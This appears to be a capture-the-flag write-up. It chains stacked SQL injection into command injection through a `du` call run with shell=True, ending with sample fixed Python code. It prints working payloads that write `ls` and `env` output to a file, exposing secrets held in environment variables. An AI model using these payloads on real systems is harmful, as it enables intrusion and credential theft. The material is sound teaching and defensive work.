We know there are images taking up some space here, but the total space used is shown as 0.
Since we already have the page's source code, we can check how the space is calculated on line 39:
```python
rep += '<i>Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1] + '</i>'
```
So the shell command being run is:
```sh
du -ch filenames || exit 0
```
Since the filenames are concatenated into a string passed to `shell=True`, we can change a filename to inject commands here.
We have the following table:
id | title | parent | filename |
---|---|---|---|
1 | Utterly adorable | 1 | files/adorable.jpg |
2 | Purrfect | 1 | files/purrfect.jpg |
3 | Invisible | 1 | FLAG1 |
Try modifying an image title:
```
id=1;UPDATE photos SET title='test' WHERE id=3;COMMIT;--
```
Successfully updated file title 3.
Now we can update the filename to achieve RCE:
```
id=1;UPDATE photos SET filename='* || ls > test.txt' WHERE id=3;COMMIT;--
```
Visit the INDEX page to execute the command:
```
id=1 UNION SELECT 'test'--
```
Here we get the ls results in the file test:
```
Dockerfile files main.py main.pyc prestart.sh requirements.txt test uwsgi.ini
```
```
id=1;UPDATE photos SET filename='* || env > test.txt' WHERE id=3;COMMIT;--
```
Visit the INDEX page to execute the command:
```
id=1 UNION SELECT 'test'--
```
Here we get all 3 flags in one place.
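As an added defensive example (my own code, not the challenge's), here are the two fixes that break this chain: the id is bound as a query parameter instead of being formatted into the SQL, and du is called with an argv list plus filename validation instead of `shell=True`. The sqlite schema and rows are constructed from the table above; the function names are assumptions.

```python
import os
import re
import sqlite3
import subprocess

# Constructed in-memory copy of the photos table from the write-up.
SCHEMA = "CREATE TABLE photos (id INTEGER, title TEXT, parent INTEGER, filename TEXT)"
ROWS = [(1, 'Utterly adorable', 1, 'files/adorable.jpg'),
        (2, 'Purrfect', 1, 'files/purrfect.jpg'),
        (3, 'Invisible', 1, 'FLAG1')]

# Plain basenames only: no '/', no spaces, no shell metacharacters.
SAFE_NAME = re.compile(r'^[A-Za-z0-9._-]+$')

def connect():
    db = sqlite3.connect(':memory:')
    db.execute(SCHEMA)
    db.executemany("INSERT INTO photos VALUES (?, ?, ?, ?)", ROWS)
    return db

def filenames_for_parent(db, parent):
    # Fix 1: bind the user-controlled value. A stacked payload such as
    # "1;UPDATE photos ..." is then compared as a single (non-matching)
    # value rather than executed as additional SQL statements.
    cur = db.execute("SELECT filename FROM photos WHERE parent = ?", (parent,))
    return [row[0] for row in cur.fetchall()]

def is_safe_filename(fn):
    base = fn[len('files/'):] if fn.startswith('files/') else fn
    return bool(SAFE_NAME.match(base)) and base not in ('.', '..')

def du_argv(filenames):
    # Fix 2: build an argv list (no shell), so '* || ls > test.txt' is just
    # a literal, non-existent filename; '--' stops option parsing, and the
    # validation above keeps every path inside files/.
    argv = ['du', '-ch', '--']
    for fn in filenames:
        if not is_safe_filename(fn):
            raise ValueError('rejected filename: %r' % fn)
        base = fn[len('files/'):] if fn.startswith('files/') else fn
        argv.append(os.path.join('files', base))
    return argv

def space_used(filenames):
    out = subprocess.run(du_argv(filenames), capture_output=True, text=True)
    # du prints "<size>\ttotal" on its last line; missing files only add stderr noise.
    return out.stdout.strip().rsplit('\n', 1)[-1]
```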